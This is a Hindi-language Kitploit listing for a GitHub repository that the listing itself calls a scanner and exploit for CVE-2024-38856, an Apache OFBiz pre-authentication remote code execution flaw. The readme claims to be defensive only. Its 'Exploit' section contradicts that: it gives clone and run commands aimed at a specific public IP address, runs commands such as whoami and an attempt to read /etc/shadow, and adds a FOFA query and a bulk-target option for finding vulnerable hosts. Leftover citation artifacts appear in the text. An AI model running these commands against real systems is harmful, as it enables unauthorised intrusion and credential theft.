Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-38856-Apache-OFBiz — CVE-2024-38856: Apache OFBiz दूरस्थ कोड निष्पादन स्कैनर और शोषण | Kitploit
उपकरण/GitHubGitHub/hex00-0x4/cve-2024-38856-apache-ofbiz
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubhex00-0x4/cve-2024-38856-apache-ofbiz

CVE-2024-38856-Apache-OFBiz

CVE-2024-38856: Apache OFBiz दूरस्थ कोड निष्पादन स्कैनर और शोषण

रिपॉजिटरी देखें
3311 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-38856 — Apache OFBiz (रिपॉजिटरी दस्तावेज़ीकरण)

रिपॉजिटरी उद्देश्य: CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE) के बारे में सूचनात्मक दस्तावेज़ीकरण।
यह रिपॉजिटरी हथियारबंद एक्सप्लॉइट कोड नहीं रखता है। यह केवल रक्षात्मक अनुसंधान, पैचिंग मार्गदर्शन, पता लगाना, और सुरक्षित प्रयोगशाला परीक्षण के लिए है।


अवलोकन

CVE-2024-38856 Apache OFBiz में एक incorrect-authorization भेद्यता है जो कुछ एंडपॉइंट्स तक अप्रमाणित पहुंच की अनुमति दे सकती है और विशिष्ट परिस्थितियों में, स्क्रीन रेंडरिंग कोड के निष्पादन को सक्षम कर सकती है, जो प्रभावित सिस्टम पर रिमोट कोड निष्पादन का कारण बन सकती है। यह मुद्दा Apache OFBiz 18.12.15 में ठीक किया गया था; 18.12.14 तक के पिछले रिलीज़ प्रभावित हैं। :contentReference[oaicite:0]{index=0}

गंभीरता / प्रभाव: कई सुरक्षा विक्रेताओं और शोधकर्ताओं ने इस भेद्यता को गंभीर (critical) रेट किया है — यह कमजोर इंस्टेंस पर अप्रमाणित रिमोट कोड निष्पादन का कारण बन सकती है, और इसे जंगल में सक्रिय शोषण प्रयासों में देखा गया है। प्रशासकों को उजागर OFBiz इंस्टेंस को उच्च-प्राथमिकता वाले सुधार आइटम के रूप में मानना चाहिए। :contentReference[oaicite:1]{index=1}


प्रभावित संस्करण

  • Apache OFBiz: 18.12.14 तक (अर्थात, <= 18.12.14 के सभी रिलीज़ को कमजोर माना जाता है)। यह मुद्दा 18.12.15 में संबोधित किया गया था। अपग्रेड करने की सिफारिश की जाती है। :contentReference[oaicite:2]{index=2}

fofa : app="Apache_OFBiz" && port="8443"
स्क्रीनशॉट 2025-10-10 183057

एक्सप्लॉइट:

git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.git

cd CVE-2024-38856-Apache-OFBiz

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"

└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"

स्क्रीनशॉट 2025-10-10 184101

─$ python3 apache_bang.py --file target.txt -c "ls"

स्क्रीनशॉट 2025-10-10 075018
टूल डाउनलोड करें